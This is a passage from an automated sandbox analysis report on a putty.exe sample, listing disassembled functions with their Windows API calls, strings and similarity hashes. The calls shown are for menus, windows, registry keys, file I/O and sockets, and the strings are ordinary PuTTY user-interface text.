                            • Instruction Fuzzy Hash: 9301A2B1784211AFD7109F55DCC2E167799AB88B09B15043BF18497156D725EC208B5B
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • DeleteMenu.USER32(00000000,00000400), ref: 0043D7D7
                            • AppendMenuA.USER32(00000000,00001000,?), ref: 0043D817
                            • AppendMenuA.USER32(00000001,00001000,(No sessions)), ref: 0043D836
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            Similarity
                            • API ID: Menu$Append$Delete
                            • String ID: (No sessions)
                            • API String ID: 2878686843-1102551510
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            Similarity
                            • API ID: _strlen$_strcat
                            • String ID: %d:
                            • API String ID: 1497175149-106572296
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • CreateDialogParamA.USER32(0000006E,?,Function_0003C35C,00000000), ref: 0043D221
                            • ShowWindow.USER32(00000000,00000001), ref: 0043D22F
                            • SetActiveWindow.USER32(0044323A,?), ref: 0043D23B
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            Similarity
                            • API ID: Window$ActiveCreateDialogParamShow
                            • String ID: tG
                            • API String ID: 4156068129-1205533789
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • GetModuleHandleA.KERNEL32(KERNEL32,0044CE02), ref: 00450A71
                            • GetProcAddress.KERNEL32(00000000,IsProcessorFeaturePresent), ref: 00450A81
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            Similarity
                            • API ID: AddressHandleModuleProc
                            • String ID: IsProcessorFeaturePresent$KERNEL32
                            • API String ID: 1646373207-3105848591
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000100,00000000,00000000), ref: 00453713
                            • GetLastError.KERNEL32 ref: 0045371D
                            • ReadFile.KERNEL32(?,?,00000001,00000000,00000000), ref: 004537DD
                            • GetLastError.KERNEL32 ref: 004537E7
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            Similarity
                            • API ID: ErrorFileLastRead
                            • String ID:
                            • API String ID: 1948546556-0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • WriteFile.KERNEL32(?,?,?,?,00000000,00000001,00000200,?), ref: 00450D43
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            Similarity
                            • API ID: FileWrite
                            • String ID:
                            • API String ID: 3934441357-0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • IsZoomed.USER32(00435016), ref: 0044141C
                            • IsZoomed.USER32 ref: 00441526
                            • SetWindowPos.USER32(00000000,00000000,00000000,?,?,00000116), ref: 0044155C
                            • InvalidateRect.USER32(00000000,00000001,?,?,?,?,?,?,?,?,?,?,0000005E), ref: 00441574
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            Similarity
                            • API ID: Zoomed$InvalidateRectWindow
                            • String ID:
                            • API String ID: 136671725-0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • ExtTextOutW.GDI32(?,?,00000000,?,?,?,?,?), ref: 0043DE69
                            • GetBkMode.GDI32(?,?,?,?,?,?), ref: 0043DE78
                            • SetBkMode.GDI32(?,00000001), ref: 0043DE86
                            • SetBkMode.GDI32(?,?), ref: 0043DE9F
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            Similarity
                            • API ID: Mode$Text
                            • String ID:
                            • API String ID: 1768155863-0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                              • Part of subcall function 0045114E: VirtualQuery.KERNEL32(?,?,0000001C), ref: 00451168
                              • Part of subcall function 0045114E: GetSystemInfo.KERNEL32(?,?,?,0000001C), ref: 00451179
                              • Part of subcall function 0045114E: VirtualQuery.KERNEL32(?,?,0000001C,?,?,0000001C), ref: 004511BF
                            • MultiByteToWideChar.KERNEL32(?,00000001,00000000,?,?,00000000,?,0044EFD2,00000000,0000000A,00000000,00000000,00000000,00000014,00450EC7,004705B4), ref: 004560E7
                            • MultiByteToWideChar.KERNEL32(?,00000009,00408DF6,00000000,00000000,00000000,?,0044EFD2,00000000,0000000A,00000000,00000000,00000000,00000014,00450EC7,004705B4), ref: 00456104
                            • MultiByteToWideChar.KERNEL32(?,00000001,00408DF6,00000000,?,00000000,?,0044EFD2,00000000,0000000A,00000000,00000000,00000000,00000014,00450EC7,004705B4), ref: 0045617A
                            • CompareStringW.KERNEL32(00000014,00457BC4,?,00000000,?,00000000,?,00000000,?,0044EFD2,00000000,0000000A,00000000,00000000,00000000,00000014), ref: 00456190
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            Similarity
                            • API ID: ByteCharMultiWide$QueryVirtual$CompareInfoStringSystem
                            • String ID:
                            • API String ID: 1997773198-0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            Similarity
                            • API ID: _strlen$___initmbctable_strcat
                            • String ID:
                            • API String ID: 109824703-0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • #14.COMCTL32(?,?,?,?), ref: 0043A04E
                            • #14.COMCTL32(?,?,?,00000000), ref: 0043A06A
                            • #14.COMCTL32(?,?,?,00000000), ref: 0043A099
                            • #14.COMCTL32(?,?,?,00000000), ref: 0043A0A7
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • GetWindowLongA.USER32(000000F0), ref: 0044061D
                            • SetWindowLongA.USER32(000000F0,00000000), ref: 0044067F
                            • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000027), ref: 00440692
                            • CheckMenuItem.USER32(00000000,00000180,00000000), ref: 004406A6
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            Similarity
                            • API ID: Window$Long$CheckItemMenu
                            • String ID:
                            • API String ID: 1924917330-0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • IsZoomed.USER32 ref: 0044111F
                            • GetWindowLongA.USER32(000000F0,00000000), ref: 00441156
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            Similarity
                            • API ID: LongWindowZoomed
                            • String ID:
                            • API String ID: 220201945-0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • SetCaretPos.USER32(FFFFFFFF,FFFFFFFF), ref: 0043E6F8
                            • ImmGetContext.IMM32 ref: 0043E71C
                            • ImmSetCompositionWindow.IMM32(00000000,?), ref: 0043E73F
                            • ImmReleaseContext.IMM32(00000000,00000000,?), ref: 0043E74B
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            Similarity
                            • API ID: Context$CaretCompositionReleaseWindow
                            • String ID:
                            • API String ID: 3049481515-0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • RegOpenKeyA.ADVAPI32(?,?,?), ref: 0044A3A8
                            • RegCloseKey.ADVAPI32(?), ref: 0044A3BE
                            • RegDeleteKeyA.ADVAPI32(?,?), ref: 0044A3CC
                            • RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 0044A3DD
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            Similarity
                            • API ID: CloseDeleteEnumOpen
                            • String ID:
                            • API String ID: 4142876296-0
                            • Opcode ID: 33c8cf9486d96dfeeba33654810e47c6faa9fa40398722fd98d4c60036d4afc4
                            • Instruction ID: 8c9754fb24c85a1e9ed99114584b7dda46696f0fd76e26bd160890ab64319033
                            • Instruction Fuzzy Hash: E0F06277500208BBEB119B94EC85EDB77BCAB05715F100172BA02D2091E674DE549FA5
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 0000000A.00000002.2599553463.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599617835.0000000000457000.00000002.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599653686.0000000000473000.00000004.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599653686.0000000000476000.00000004.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599702333.0000000000479000.00000002.00000001.01000000.0000000B.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_400000_putty.jbxd
                            Similarity
                            • API ID: ___addl
                            • String ID:
                            • API String ID: 2260456530-0
                            • Opcode ID: a57031d3826d41fa4185fc8bb056b61850cf5809c5a657e3baa8031fcfaa38dc
                            • Instruction ID: 20e121dd30b62a73a5987c52efb93d479c908b94fb66fc643d0fd64b7ce7e240
                            • Instruction Fuzzy Hash: 76F04976400606AFDA205E52DC11E67B7ADEF44305B4A442AFD598B232F732E86DCB51
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • EnableWindow.USER32(?,00000000), ref: 0043CE79
                            • DialogBoxParamA.USER32(0000006F,?,Function_0003C5EF,00000000), ref: 0043CE8B
                            • EnableWindow.USER32(?,00000001), ref: 0043CE94
                            • SetActiveWindow.USER32(?,?,?,004386A6,?), ref: 0043CE97
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 0000000A.00000002.2599553463.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599617835.0000000000457000.00000002.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599653686.0000000000473000.00000004.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599653686.0000000000476000.00000004.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599702333.0000000000479000.00000002.00000001.01000000.0000000B.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_400000_putty.jbxd
                            Similarity
                            • API ID: Window$Enable$ActiveDialogParam
                            • String ID:
                            • API String ID: 1750746890-0
                            • Opcode ID: d6e1004ed0e8d37d3a7dd8f6097f5c62410c37e37f7db7cbe9f9011426a59ac2
                            • Instruction ID: cf8ff7aa25c50bf4367434cd22a51b16713c7aac3047b7605556659b2f114e12
                            • Instruction Fuzzy Hash: 3FD01232245321B7D5212B15BC09FCB3A59DFC6B62F120031F600A60E186A46582CBAD
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • GetTickCount.KERNEL32 ref: 0041DD92
                              • Part of subcall function 0043754F: GetTickCount.KERNEL32 ref: 00437555
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 0000000A.00000002.2599553463.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599617835.0000000000457000.00000002.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599653686.0000000000473000.00000004.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599653686.0000000000476000.00000004.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599702333.0000000000479000.00000002.00000001.01000000.0000000B.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_400000_putty.jbxd
                            Similarity
                            • API ID: CountTick
                            • String ID: cipher settings changed$l1F
                            • API String ID: 536389180-1288798538
                            • Opcode ID: 37cc1f4bba452fd31941a3c92e4c152347f6aed089a1571b4919581d15e2f3c3
                            • Instruction ID: 037755590c7964ed9bce45aec08a3dc3ad440927693602561ca2ded80dfd27ad
                            • Instruction Fuzzy Hash: 9351C1B1900704BBDF30AF70CC457DE7BA5EB14344F14442BF9596A2D1E7BA5A90CA49
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                              • Part of subcall function 00402263: _wctomb_s.LIBCMT ref: 004022D1
                            • _strlen.LIBCMT ref: 0040E9F0
                            • _strlen.LIBCMT ref: 0040E9F9
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 0000000A.00000002.2599553463.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599617835.0000000000457000.00000002.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599653686.0000000000473000.00000004.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599653686.0000000000476000.00000004.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599702333.0000000000479000.00000002.00000001.01000000.0000000B.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_400000_putty.jbxd
                            Similarity
                            • API ID: _strlen$_wctomb_s
                            • String ID: gvE
                            • API String ID: 412625300-3440013272
                            • Opcode ID: e7c1533d359c56cfbe03f80bb16ef1df71e80e75c0f4a465763cdb45d092ac71
                            • Instruction ID: 9385c3af9ee7fc7988ff63bbafa3d5ef767caadab69462dc6d873d994c89d382
                            • Instruction Fuzzy Hash: 8B41F671D04148EFEF119FA69841AAF7FA5EB19304F1408BBF98173292D3394E21DB59
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 0000000A.00000002.2599553463.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599617835.0000000000457000.00000002.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599653686.0000000000473000.00000004.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599653686.0000000000476000.00000004.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599702333.0000000000479000.00000002.00000001.01000000.0000000B.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_400000_putty.jbxd
                            Similarity
                            • API ID: Info
                            • String ID: $
                            • API String ID: 1807457897-3032137957
                            • Opcode ID: cfd2078484904b03652ffcce17ea91c1e5cd38d10a5da9535ec71e645dd1aabd
                            • Instruction ID: e293c6174213da809473671e62f3e80c07c5b42daa28f1cbedd4753c40da3cfb
                            • Instruction Fuzzy Hash: CA4129301082586EEB118B58DC59FFA7BE8EB4A309F6404E6DD49CB163D3584EC997DC
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                              • Part of subcall function 004553C1: SetFilePointer.KERNEL32(00000000,0044FDD7,00000000,00000000,?,00000200,?,0044FD6D,?,00000000,00000002,?,?,00000000,?,0044FDD7), ref: 00455404
                              • Part of subcall function 004553C1: GetLastError.KERNEL32 ref: 00455411
                            • SetEndOfFile.KERNEL32(00000000,?,?,?,00000100,?,?,?,004545E1,00000000,80000000), ref: 00456647
                            • GetLastError.KERNEL32(?,?,?,00000100,?,?,?,004545E1,00000000,80000000), ref: 00456665
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 0000000A.00000002.2599553463.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599617835.0000000000457000.00000002.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599653686.0000000000473000.00000004.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599653686.0000000000476000.00000004.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599702333.0000000000479000.00000002.00000001.01000000.0000000B.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_400000_putty.jbxd
                            Similarity
                            • API ID: ErrorFileLast$Pointer
                            • String ID: EE
                            • API String ID: 1697706070-1871289027
                            • Opcode ID: ba8fc23caf237dfa95d83004f50e6b8037f378dbb20800f3b73f2a2fce86c3a9
                            • Instruction ID: 8ad03c32e105a8f2277c3a83af6cca2facfef73172a64635b2a61f8a01884430
                            • Instruction Fuzzy Hash: 2631287190061067CB205F39DC82B9A36689B04366F92427BFD2D973D3E678E98C479C
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 0000000A.00000002.2599553463.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599617835.0000000000457000.00000002.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599653686.0000000000473000.00000004.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599653686.0000000000476000.00000004.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599702333.0000000000479000.00000002.00000001.01000000.0000000B.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_400000_putty.jbxd
                            Similarity
                            • API ID: __shift_strcat_strlen
                            • String ID: e+000
                            • API String ID: 208078240-1027065040
                            • Opcode ID: 246078e9e64013b2aa750b5b736563a464de749df3467947e0c7a70ae0d48823
                            • Instruction ID: 3a3ea46fa99b1caf5b65492f7c7ac0b43b6957ba20ec056d0b30ce20cbd7db09
                            • Instruction Fuzzy Hash: F931283A2057809FD7199F38DC90AA63B95AF06319B1C80BEE845CB353C679D845C755
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • WideCharToMultiByte.KERNEL32(?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,0000FDE9,?,00408B41,?,00000000,00000000,00000000), ref: 0044A9EF
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 0000000A.00000002.2599553463.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599617835.0000000000457000.00000002.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599653686.0000000000473000.00000004.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599653686.0000000000476000.00000004.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599702333.0000000000479000.00000002.00000001.01000000.0000000B.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_400000_putty.jbxd
                            Similarity
                            • API ID: ByteCharMultiWide
                            • String ID: ..\windows\winucs.c$p - mbstr < mblen
                            • API String ID: 626452242-4099138194
                            • Opcode ID: 9ab7f4da5ee4f365479a2ec608e8e5b4fe9e3d628077e11bbc068df1fd06a4b2
                            • Instruction ID: 8ea2330da6aa4ede292e55c39134cb9aba10f25137eab1dd91759a04a91dcbe8
                            • Instruction Fuzzy Hash: 3D31A1B1244246EBEF11CE14C880AAA3BA5FF59704B16085EF985DB241D239D8B1CBA6
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                              • Part of subcall function 0044C558: _strcat.LIBCMT ref: 0044C598
                              • Part of subcall function 0044C558: GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,?,?,?,?,00000002), ref: 0044C5D6
                              • Part of subcall function 0044C558: _strcat.LIBCMT ref: 0044C5EC
                              • Part of subcall function 0044C558: _strlen.LIBCMT ref: 0044C5FC
                              • Part of subcall function 0044C558: _strlen.LIBCMT ref: 0044C60D
                              • Part of subcall function 0044C558: _strncpy.LIBCMT ref: 0044C628
                              • Part of subcall function 0044C558: _strlen.LIBCMT ref: 0044C665
                              • Part of subcall function 0044C558: _strlen.LIBCMT ref: 0044C67A
                            • SetEvent.KERNEL32(?,&Paste,?,?,?,?,?,?,?,0000000E), ref: 00445A4A
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 0000000A.00000002.2599553463.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599617835.0000000000457000.00000002.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599653686.0000000000473000.00000004.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599653686.0000000000476000.00000004.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599702333.0000000000479000.00000002.00000001.01000000.0000000B.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_400000_putty.jbxd
                            Similarity
                            • API ID: _strlen$_strcat$EventFileModuleName_strncpy
                            • String ID: ..\windows\winhandl.c$handles_by_evtomain
                            • API String ID: 1703333348-573761421
                            • Opcode ID: 87f7cb50ad824672645637ba9a74d971bcd6b3e43b6fde2f1367ee4632098da4
                            • Instruction ID: d3221f3f774266ad5dfdf7634808aac566736a4dd63c86dc00c78d495153aa18
                            • Instruction Fuzzy Hash: C821FD71440F01AFEB32AB258C458BB77F8EF813157140A2FF487A1542D339A9458BAE
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • htonl.WS2_32(?), ref: 004475CE
                            • socket.WS2_32(00000002,00000002,00000000), ref: 004475F9
                            Strings
                            • Unable to get list of local IP addresses, xrefs: 00447638
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 0000000A.00000002.2599553463.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599617835.0000000000457000.00000002.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599653686.0000000000473000.00000004.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599653686.0000000000476000.00000004.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599702333.0000000000479000.00000002.00000001.01000000.0000000B.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_400000_putty.jbxd
                            Similarity
                            • API ID: htonlsocket
                            • String ID: Unable to get list of local IP addresses
                            • API String ID: 3233345542-1500252401
                            • Opcode ID: ade47a866735f45ef79af25781fca5026a3b16cbded501ecf01061f5bb2a3ec2
                            • Instruction ID: fd683b6f3d59761003ae3699fbd703b8595f4fe5257569eb93f1573ee789fd74
                            • Instruction Fuzzy Hash: D6113A71349A20BAF32447399C42EAF365B9792B60F61842BF10DD1381D72C984382AD
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • ___initmbctable.LIBCMT ref: 00453F5B
                            • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\putty.exe,00000104,75570A60,00000000,?,?,?,?,0044F24B,?,00470420,00000060), ref: 00453F73
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 0000000A.00000002.2599553463.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599617835.0000000000457000.00000002.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599653686.0000000000473000.00000004.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599653686.0000000000476000.00000004.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599702333.0000000000479000.00000002.00000001.01000000.0000000B.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_400000_putty.jbxd
                            Similarity
                            • API ID: FileModuleName___initmbctable
                            • String ID: C:\Users\user\putty.exe
                            • API String ID: 767393020-4276210984
                            • Opcode ID: 867c797f2cc84a55a73943c8c416907671bbb4afc0d7053cf93466af54852232
                            • Instruction ID: fd3a0a6d756cdf4ca149efbbe42414777097d17c5eaff8033d3625615ca87b7a
                            • Instruction Fuzzy Hash: 1911B672A08104AFDB10DBA9EC4199B77B8EB443A6F51017AFC05D3242D6749E48C759
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • GetCharacterPlacementW.GDI32(?,?,?,00000000,?,0008113B), ref: 0043DD63
                            • ExtTextOutA.GDI32(?,?,?,?,?,00000000,?,?), ref: 0043DD85
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 0000000A.00000002.2599553463.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599617835.0000000000457000.00000002.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599653686.0000000000473000.00000004.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599653686.0000000000476000.00000004.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599702333.0000000000479000.00000002.00000001.01000000.0000000B.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_400000_putty.jbxd
                            Similarity
                            • API ID: CharacterPlacementText
                            • String ID: $
                            • API String ID: 2370387697-3993045852
                            • Opcode ID: 58643f9e01a28be3f2b773a1e60f1cbe9f2ff598f6a176d3656c51e1f3cd9524
                            • Instruction ID: f61a35eec1c2390f81a0b448f80d304060f7f9f579c1a96e5c90197f837429ec
                            • Instruction Fuzzy Hash: F4114C72900208BBDF219F95CC8AFDFBBBDEB08714F100126FA05B6191D7759A109BA8
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • SendDlgItemMessageA.USER32(?,?,0000014B,00000000,00000000), ref: 0043B149
                            Strings
                            • ..\windows\winctrls.c, xrefs: 0043B114
                            • c && (c->ctrl->generic.type == CTRL_LISTBOX || (c->ctrl->generic.type == CTRL_EDITBOX && c->ctrl->editbox.has_list)), xrefs: 0043B119
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 0000000A.00000002.2599553463.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599617835.0000000000457000.00000002.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599653686.0000000000473000.00000004.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599653686.0000000000476000.00000004.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599702333.0000000000479000.00000002.00000001.01000000.0000000B.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_400000_putty.jbxd
                            Similarity
                            • API ID: ItemMessageSend
                            • String ID: ..\windows\winctrls.c$c && (c->ctrl->generic.type == CTRL_LISTBOX || (c->ctrl->generic.type == CTRL_EDITBOX && c->ctrl->editbox.has_list))
                            • API String ID: 3015471070-3468507388
                            • Opcode ID: 82b5c499cea7190c6fd1f8820b32ed1f852076e1d11ce05cc6d31acb370435a2
                            • Instruction ID: d5d5fa8d8eb9d04727cf7d4c512b50cdf67a5bbfe65ddb30aec08dca05ee76b1
                            • Instruction Fuzzy Hash: B5F09671740211EFDF205B08DCA1F2637A5EF89761F21506BF2499B2A1CB789C50CB9A
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • MessageBoxA.USER32(00000000,00000000,00000000,00000223), ref: 0043D411
                            Strings
                            • %s Log to File, xrefs: 0043D3F9
                            • The session log file "%.*s" already exists.You can overwrite it with a new session log,append your session log to the end of it,or disable session logging for this session.Hit Yes to wipe the file, No to append to it,or Cancel to disable logging., xrefs: 0043D3E7
                            Memory Dump Source
